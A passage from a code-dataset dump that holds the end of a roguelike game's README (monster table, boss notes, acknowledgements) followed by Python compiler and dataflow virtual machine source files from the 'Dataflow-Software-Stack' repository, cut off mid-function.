class=\"org-left\">priest</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'taika'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 fighter</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl10 mage</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">pirate</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">master ninja</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">shy ghost</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">moon phantom</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">High e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">demon cat</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fi,co,sen</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">golem</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">High e.p. weak to 'senmetsu'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">flame dragon</td>\n<td class=\"org-left\">dragon</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ascetic priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'shisubeshi'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">mad wizard</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'chissoku'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">master</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">musashi</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Attack only, critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">vampire</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Drain lvl 2</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">earth demon</td>\n<td class=\"org-left\">demon</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">'zettaireido', regist death 66%</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">rotten giant</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">breath, weak on 'senmetsu'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">rotten dragon</td>\n<td class=\"org-left\">dragon</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'zettaireido', breath</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">dark baron</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">hattori</td>\n<td class=\"org-left\">conhead</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Attack only, critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">joker</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">breath, critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">arch wizard</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'chissoku', 'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">magatsukami</td>\n<td class=\"org-left\">unseen being</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Drain lvl 3, 'kakubaku', etc.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">dracula</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Drain lvl 4, 'chissoku'</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orge29b2ef\"></a>\n\n## Boss and special monsters\n\n\n<a id=\"org7b8b294\"></a>\n\n### gate keeper\n\nHuge scorpion originated in an SNES game, Tenchi-sozo.\nIt was a boss monster on floor 1 but hasn't been implemented. Rather weak on deepest floors.\n\n\n<a id=\"org93ed8e5\"></a>\n\n### d????? ???, t?? ????, a????\n\nBoss monsters. You'll need special keys to break into the boss rooms. Special keys should be placed somewhere on the same floor. Look for `,` floor tile.\n\n\n<a id=\"orgf5f2654\"></a>\n\n### d????? ????\n\nThe last boss. He is with mighty earth demons, which makes the last battle most difficult to win. Hint: Use certain spells. Though extremely risky, you would have no other choice.\n\n\n<a id=\"org52768ce\"></a>\n\n### S???????, N??????\n\nAncient gods from the past. You are doomed to be destroyed. Run away immediately if you see them.\n\n\n<a id=\"org861f339\"></a>\n\n# Contact\n\nKyosuke Achiwa - @kyos\\_achwan - achiwa912+gmail.com (please replace `+` with `@`)\n\nProject Link: <https://github.com/achiwa912/daemonlord>\n\n\n<a id=\"org99eca6e\"></a>\n\n# Acknowledgements\n\nThank you very much for these great Wizardry and Rogue sites.\n\n- [得物屋24時間 BOLTAC'S TRADING POST](http://www.pekori.jp/~emonoya/) Various monster, spell, item data\n- [Wizardry(NES) 解析](https://taotao54321.github.io/appsouko/work/Game/Wiz1_NES/) Internal algorityms of NES Wizardry\n- [ず's WiLiKi Wizardry1/Apple/解析メモ](https://wiliki.zukeran.org/index.cgi?Wizardry1%2FApple%2F%B2%F2%C0%CF%A5%E1%A5%E2) Internal algorithms of Apple II Wizardry\n- [We Love WIZARDRY for WonderSwan](http://multix.jp/wizardry/) Monster, spell, item data table\n- [Yet Another Roguelike Tutorial - Written in Python 3 and TCOD](http://rogueliketutorials.com/tutorials/tcod/v2/) Auto-generate maps\n\n" } ]
2
mathsaey/Dataflow-Software-Stack
https://github.com/mathsaey/Dataflow-Software-Stack
b6cd4ffc26d3d46aec514484779e1d3cd35ecdf4
93bf5c9f166f326947a9b725518190bf530a80bc
dc0dfcdbccb7fcdca463804ea03b106b558aed57
refs/heads/master
2016-09-06T08:31:56.790178
2014-09-30T18:26:21
2014-09-30T18:26:21
12,961,445
0
2
null
null
null
null
null
[ { "alpha_fraction": 0.695207953453064, "alphanum_fraction": 0.7003162503242493, "avg_line_length": 24.073171615600586, "blob_id": "1793777b261a1ab919b2a72e1125eb7fba8f9d20", "content_id": "7b351aaafa87ca26c83acd73818b03e3c4b60e6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4111, "license_type": "no_license", "max_line_length": 79, "num_lines": 164, "path": "/DISc/frontEnd/IF1/graph.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# graph.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.graph\n# \\brief Node parser\n# \n# This module allows us to parse all of the \n# graph elements (compound nodes, nodes and subgraphs)\n##\n\nimport environment\nimport operations\nimport compound\nimport type\n\nimport IGR\n\n# --------- #\n# Constants #\n# --------- #\n\n# N <label> <operation code>\n_n_label_idx \t= 1\n_n_code_idx \t= 2\n\n# G <type_reference> <name>\n# X <type_reference> <name>\n# I <type_reference> <name>\n_g_type_idx\t\t= 1\n_g_name_idx\t\t= 2\n\n# { Compound <label> <operation code>\n_cs_label_idx\t= 2\n_cs_code_idx \t= 3\n\n# } <label> <operation code> <association list length> <association list>\n_ce_label_idx\t= 1\n_ce_code_idx \t= 2\n_ce_len_idx\t\t= 3\n_ce_lis_idx\t\t= 4\n\n# ------------ #\n# Graph Parser #\n# ------------ #\n\n## Parse a standard subgraph.\ndef parseSubGraph(arr, ctr):\n\tname = arr[_g_name_idx][1:-1]\n\ttypeIdx = int(arr[_g_type_idx])\n\tsig = type.getType(typeIdx)\n\tinputs = len(sig.args.list)\n\toutputs = len(sig.res.list)\n\n\tgraph = IGR.createSubGraph(name, inputs, outputs)\n\n\tenvironment.popScope()\n\tenvironment.scope(graph)\n\n## Parse a subgraph of a compound node.\ndef parseCompoundSubGraph(arr, ctr):\n\tgraph = IGR.createCompoundSubGraph()\n\n\tenvironment.popScope()\n\tenvironment.addSubGraph(graph)\n\tenvironment.scope(graph)\n\n## \n# Determine which kind of \n# subgraph we are dealing with.\n##\ndef parseGraph(arr, ctr):\n\tif environment.isCompound():\n\t\tparseCompoundSubGraph(arr, ctr)\n\telse: \n\t\tparseSubGraph(arr, ctr)\n\n# ----------- #\n# Node Parser #\n# ----------- #\n\ndef parseNode(arr, ctr): \n\tlabel = int(arr[_n_label_idx])\n\topCode = int(arr[_n_code_idx])\n\tnode = None\n\n\toperation = operations.get(opCode)\n\tnode = IGR.createOperationNode(environment.getSubGraph(), operation)\n\n\tenvironment.addNode(label, node)\n\n# --------------- #\n# Compound Parser #\n# --------------- #\n\n##\n# Parse the start of a compound node.\n#\n# We do this by creating a compound scope to \n# store the subgraphs. We also tell the environment\n# that we entered a compound node.\n#\n# Finally, we add a dummy node that will be popped\n# by the first subgraph we meet.\n##\ndef parseCompoundStart(arr, ctr):\n\tenvironment.scopeCompound()\n\tenvironment.enterComp()\n\tenvironment.scope(None)\n\ndef parseCompoundEnd(arr, ctr):\n\t# Enter the compound scope\n\tenvironment.popScope()\n\t\n\t# get and order the subgraphs of the compound node.\n\tlength = int(arr[_ce_len_idx])\n\tendIdx = _ce_lis_idx + length\n\tassocLst = arr[_ce_lis_idx:endIdx]\n\tsubGraphs = environment.getSubGraphs()\n\tresGraphs = []\n\n\tfor idx in assocLst:\n\t\tgraph = subGraphs[int(idx)]\n\t\tgraph.name = str(idx)\n\t\tresGraphs += [graph]\n\n\t# Restore the environment\n\tenvironment.exitComp()\n\tenvironment.popScope()\n\n\t# Create the compound node\n\tcompType = arr[_ce_code_idx]\n\tcompType = compound.getCompound(compType, ctr)\n\tnode = IGR.createCompoundNode(\n\t\tcompType, \n\t\tenvironment.getSubGraph(), \n\t\tresGraphs)\n\n\t# Add the node to the environment.\n\tlabel = int(arr[_ce_label_idx])\n\tenvironment.addNode(label, node)" }, { "alpha_fraction": 0.55105060338974, "alphanum_fraction": 0.6348031759262085, "avg_line_length": 22.46527862548828, "blob_id": "3b761c0d17187f45c647bc03467d59adcae17606", "content_id": "dffe1b2ad2d1bad42ce98d6e3146af9685ca85a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3379, "license_type": "no_license", "max_line_length": 87, "num_lines": 144, "path": "/DISc/frontEnd/IF1/operations.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# operations.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.operations\n# \\brief IF1 operations\n#\n# This module defines names for the various IF1\n# node types.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# ---------------- #\n# Function Mapping #\n# ---------------- #\n\noperations = {\n\t100 : 'arrAddBck',\n\t101 : 'arrAddFrnt',\n#\t102 : 'AAdjust', # Unknown operation\n\t103 : 'ABuild',\n\t104 : 'arrCat',\n\t105 : 'arrGet',\n\t106 : 'AFill',\n\t107 : 'AGather',\n\t108 : 'arrIsEmpty',\n\t109 : 'arrBound',\n\t110 : 'ALimL',\n#\t111 : 'ARemH',\n#\t112 : 'ARemL',\n\t113 : 'arrRepl',\n\t114 : 'AScatter',\n\t115 : 'ASetL',\n\t116 : 'arrLen',\n\t117 : 'abs',\n#\t118 : 'BindArguments',\n\t119 : 'bool',\n\t120 : 'Call',\n\t121 : 'string',\n\t122 : 'div',\n\t123 : 'float',\n\t124 : 'equals',\n\t125 : 'Exp',\n#\t126 : 'FirstValue',\n#\t127 : 'FinalValue',\n\t128 : 'floor',\n\t129 : 'int',\n#\t130 : 'IsError',\n\t131 : 'less',\n\t132 : 'lessEq',\n\t133 : 'max',\n\t134 : 'min',\n\t135 : 'sub',\n\t136 : 'mod',\n\t137 : 'neg',\n\t138 : 'noOp',\n\t139 : 'not',\n\t140 : 'notEq',\n\t141 : 'add',\n\t142 : 'range',\n#\t143 : 'RBuild',\n#\t144 : 'RElements',\n#\t145 : 'RReplace',\n#\t146 : 'RedLeft',\n#\t147 : 'RedRight',\n#\t148 : 'RedTree',\n#\t149 : 'Reduce',\n#\t150 : 'RestValues',\n\t151 : 'float',\n\t152 : 'mul',\n#\t153 : 'Trunc',\n#\t154 : 'PrefixSize',\n#\t155 : 'Error',\n#\t156 : 'ReplaceMulti',\n#\t157 : 'Convert',\n#\t158 : 'CallForeign',\n#\t159 : 'AElementN',\n#\t160 : 'AElementP',\n#\t161 : 'AElementM',\n#\t170 : 'AAddLAT',\n#\t171 : 'AAddHAT',\n#\t172 : 'ABufPartition',\n#\t173 : 'ABuildAT',\n#\t174 : 'ABufScatter',\n#\t175 : 'ACatenateAT',\n#\t176 : 'AElementAT',\n#\t177 : 'AExtractAT',\n#\t178 : 'AFillAT',\n#\t179 : 'AGatherAT',\n#\t180 : 'ARemHAT',\n#\t181 : 'ARemLAT',\n#\t182 : 'AReplaceAT',\n#\t183 : 'ArrayToBuf',\n#\t184 : 'ASetLAT',\n#\t185 : 'DefArrayBuf',\n#\t186 : 'DefRecordBuf',\n#\t187 : 'FinalValueAT',\n#\t188 : 'MemAlloc',\n#\t189 : 'BufElements',\n#\t190 : 'RBuildAT',\n#\t191 : 'RecordToBuf',\n#\t192 : 'RElementsAT',\n#\t193 : 'ReduceAT',\n#\t19 : ShiftBuffer,\n#\t195 : 'ScatterBufPartitions',\n#\t196 : 'RedLeftAT',\n#\t197 : 'RedRightAT',\n#\t198 : 'RedTreeAT'\n}\n\ndef get(label, ctr = \"?\"):\n\tkey = int(label)\n\ttry:\n\t\tfunc = operations[key]\n\texcept KeyError:\n\t\tlog.error(\"Line %s, Undefined function code encountered: %d, using NoOp\", ctr, label)\n\t\treturn 'noOp'\n\telse: \n\t\treturn func\n" }, { "alpha_fraction": 0.7193605899810791, "alphanum_fraction": 0.7225577235221863, "avg_line_length": 25.30841064453125, "blob_id": "8e1376ed9533d302b68b51f5f3ef4d395be53b3b", "content_id": "a7a5a42dc286c9d0319ab26e7d496e1e93245266", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "no_license", "max_line_length": 85, "num_lines": 107, "path": "/DISc/backEnd/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd\n# \\brief DISc backend Selector\n# \n# This module serves as an interface to any backend that the user may choose.\n#\n# A backend only needs to define 2 elements.\n# * A function generate(), that takes no inputs and that \n#\treturns a string version of the output language.\n# * An *extension* attribute that contains the file extension of the output language.\n##\n\nimport importlib\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## Store the current back end\nbackEnd = None\n\n## Path to the output file.\npath = None\n\n##\n# Select a backend to use.\n#\n# \\param name \n#\t\tA name that matches a package in the\n#\t\tbackend package.\n##\ndef set(name):\n\tglobal backEnd\n\ttry:\n\t\tbackEnd = importlib.import_module('.%s' % name, __name__)\n\texcept ImportError:\n\t\tlog.error(\"Backend '%s' not found.\", name)\n\n##\n# Set up the backend from the\n# command line arguments.\n#\n# \\param fileName\n#\t\tThe name of the input file, without\n#\t\tthe extension.\n# \\param backEndFlag\n#\t\tThe value passed to the backend flag.\n# \\param outputFlag\n#\t\tThe value passed to the output flag.\n##\ndef setUp(fileName, backEndFlag, outputFlag):\n\tglobal path\n\tset(backEndFlag)\n\n\tif backEnd:\n\t\tif outputFlag: path = outputFlag\n\t\telse: path = '%s.%s' % (fileName, backEnd.extension)\n\telse:\n\t\tlog.error(\"No backend specified...\")\n\n## \n# Ask the backend to\n# Generate the output language.\n##\ndef generate():\n\tif backEnd:\n\t\treturn backEnd.generate()\n\telse:\n\t\tlog.error(\"No backend specified...\")\n\n##\n# Write the generated output\n# to a file.\n##\ndef toFile():\n\tif backEnd:\n\t\tresult = generate()\n\t\tfile = open(path, 'w')\n\t\tfile.write(result)\n\t\tfile.close()\n\telse:\n\t\tlog.error(\"No backend specified...\")\n" }, { "alpha_fraction": 0.6828581690788269, "alphanum_fraction": 0.6857947111129761, "avg_line_length": 24.704402923583984, "blob_id": "7b2e5675460e088ea015e6e9ca223bade77be3a9", "content_id": "38408f46b620b6eb4cefb56aacb03cc11f5bdd6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8173, "license_type": "no_license", "max_line_length": 79, "num_lines": 318, "path": "/DVM/core/tokenizer.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# tokenizer.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.tokenizer\n# \\brief DVM token creator\n#\n# This module defines the more practical part of\n# the instruction execution. It is responsible for generating\n# new tokens for instructions. It's also responsible for managing\n# the contexts and destinations of these tokens when the semantics of\n# the instruction call for it.\n##\n\nfrom token import Tag, StopTag, Token\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# DVM Token creator.\n#\n# The token creator is responsible for\n# wrapping results of instructions in tokens.\n##\nclass Tokenizer(object):\n\tdef __init__(self, core):\n\t\tsuper(Tokenizer, self).__init__()\n\t\tself.core = core\n\n\t\tself.switcher = Switcher(self)\n\t\tself.contexts = ContextManager(self)\n\n\t\tself.contextMap = {}\n\t\tself.restoreMap = {}\n\n\t##\n\t# Add a token to the runtime.\n\t# Use instead of directly using the core, so that\n\t# we have a central point for redirecting the token\n\t# to a different core.\n\t##\n\tdef add(self, token, core = None):\n\t\tself.core.add(token, core)\n\n\t## Create a simple token, with a known destination.\n\tdef simple(self, datum, toInst, toPort, context, core = None):\n\t\ttag = Tag(toInst, toPort, context)\n\t\ttok = Token(datum, tag)\n\n\t\tif core == None:\n \t\t\tself.add(tok)\n \t\telse:\n \t\t\tself.add(tok, core)\n\n\t##\n\t# Create a stop token.\n\t#\n\t# \\param tok\n\t#\t\tThe token to convert to\n\t#\t\ta stop token.\n\t##\n\tdef stopToken(self, tok):\n\t\ttok.tag = StopTag()\n\t\tself.add(tok)\n\n##\n# Context Manager\n#\n# The Context manager is reponsible for changing\n# and restoring the context of tokens.\n##\nclass ContextManager(object):\n\tdef __init__(self, tokenizer):\n\t\tsuper(ContextManager, self).__init__()\n\t\tself.tokenizer = tokenizer\n\n\t\t##\n\t\t# Stores the contexts that have already been\n\t\t# created. This is needed incase multiple tokens\n\t\t# need to be sent to the same context (e.g. function call)\n\t\t##\n\t\tself.contextMap = {}\n\n\t\t##\n\t\t# Stores the old context and the destination\n\t\t# for restoring contexts.\n\t\t##\n\t\tself.restoreMap = {}\n\n\t## \n\t# Send a token to a different context.\n\t# Create this context first if it does not exist yet.\n\t# Further tokens from the same source (instruction, context) pair\n\t# will be sent to the same context.\n\t#\n\t# \\param token\n\t#\t\tThe token to change and send.\n\t# \\param inst\n\t#\t\tThe instruction that wants to change the token.\n\t# \\param dest\n\t#\t\tThe new destination of the token.\n\t# \\param retInst\n\t#\t\tThe instance to send the token to\n\t#\t\twhen restoring the context.\n\t# \\param binds\n\t#\t\tThe amount of tokens that will \n\t#\t\tbe bound to the context.\n\t# \\param restores\n\t#\t\tThe amount of tokens the context will \n\t#\t\tproduce before being deleted.\n\t##\n\tdef bindMany(self, token, inst, dest, retInst, binds, restores):\n\t\tkey = (inst.key, token.tag.cont)\n\t\tcont = None\n\t\tcore = None\n\n\t\tif key in self.contextMap:\n\t\t\ttup = self.contextMap[key]\n\t\t\tcont = tup[0]\n\t\t\tcore = tup[2]\n\t\t\ttup[1] -= 1\n\n\t\t\tif tup[1] <= 0:\n\t\t\t\tdel self.contextMap[key]\n\n\t\telse:\n\t\t\tcont, core = self.bind(retInst, None, token.tag.cont, restores)\n\t\t\tif binds > 1:\n\t\t\t\tself.contextMap.update({key : [cont, binds - 1, core]})\n\n\t\t\tfor key in inst.getLiterals():\n\t\t\t\tval = inst.getLiterals()[key]\n\t\t\t\ttag = Tag(dest, key, cont)\n\t\t\t\ttok = Token(val, tag)\n\t\t\t\tself.tokenizer.add(tok, core)\n\n\t\ttoken.tag.cont = cont\n\t\ttoken.tag.inst = dest\n\t\tself.tokenizer.add(token, core)\n\n \t##\n \t# Bind a new context to a given context and destination.\n \t# When a token with the new context encounters a context restore\n \t# operation, it will be bound to the old context, and new instruction.\n \t#\n \t# \\param destination\n \t#\t\tThe instruction to bind to the context.\n \t# \\param port\n \t#\t\tThe port to bind to the context.\n \t#\t\tNone if the port should not change.\n \t# \\param context\n \t#\t\tThe context to restore.\n \t# \\param restores\n \t#\t\tThe amount of tokens the context will produce.\n \t##\n \tdef bind(self, destInst, destPort, context, restores):\n \t\tcore = self.tokenizer.core.getCore()\n \t\tcont = self.tokenizer.core.contextCreator.get()\n \t\tself.restoreMap.update({cont : [destInst, destPort, context, restores]})\n \t\treturn (cont, core)\n\n\t##\n\t# Restore a token.\n\t#\n\t# In order to do this, we simply change the\n\t# destination and context of the token to those\n\t# found in the restoremap.\n\t##\n\tdef restore(self, token):\n\t\tcont = token.tag.cont\n\n\t\tif cont.core != self.tokenizer.core.identifier:\n\t\t\tself.tokenizer.add(token, cont.core)\n\t\t\treturn\n\n\t\tpair = self.restoreMap[cont]\n\n\t\tpair[3] -= 1\n\n\t\tif pair[3] <= 0:\n\t\t\tdel self.restoreMap[cont]\n\t\t\tself.tokenizer.core.contextCreator.restore(cont)\n\n\t\ttoken.tag.inst = pair[0]\n\t\ttoken.tag.cont = pair[2]\n\t\tif pair[1] is not None:\n\t\t\ttoken.tag.port = pair[1]\n\t\tself.tokenizer.add(token)\n\n##\n# Token Switcher\n#\n# The token switcher is responsible for storing and \n# sending tokens for a switch instruction.\n##\nclass Switcher(object):\n\tdef __init__(self, tokenizer):\n\t\tsuper(Switcher, self).__init__()\n\t\tself.tokenizer = tokenizer\n\n\t\t##\n\t\t# Store the tokens that\n\t\t# have not received a destination\n\t\t##\n\t\tself.storage = {}\n\n\t\t##\n\t\t# Store the known destination\n\t\t# of certain switch instructions.\n\t\t##\n\t\tself.destinations = {}\n\n\t##\n\t# Send a token to it's destination.\n\t# Assumes the destination is present in the\n\t# destination map.\n\t#\n\t# \\param key\n\t#\t\tThe key of the switch.\n\t# \\param token\n\t#\t\tThe token to send.\n\t##\n\tdef send(self, key, token):\n\t\tdst = self.destinations[key]\n\t\ttoken.tag.inst = dst\n\t\tself.tokenizer.add(token)\n\t## \n\t# Store a token.\n\t#\n\t# \\param key\n\t#\t\tThe key of the switch.\n\t# \\param token\n\t#\t\tThe token to store.\n\t##\n\tdef store(self, key, token):\n\t\tif key in self.storage:\n\t\t\tlst = 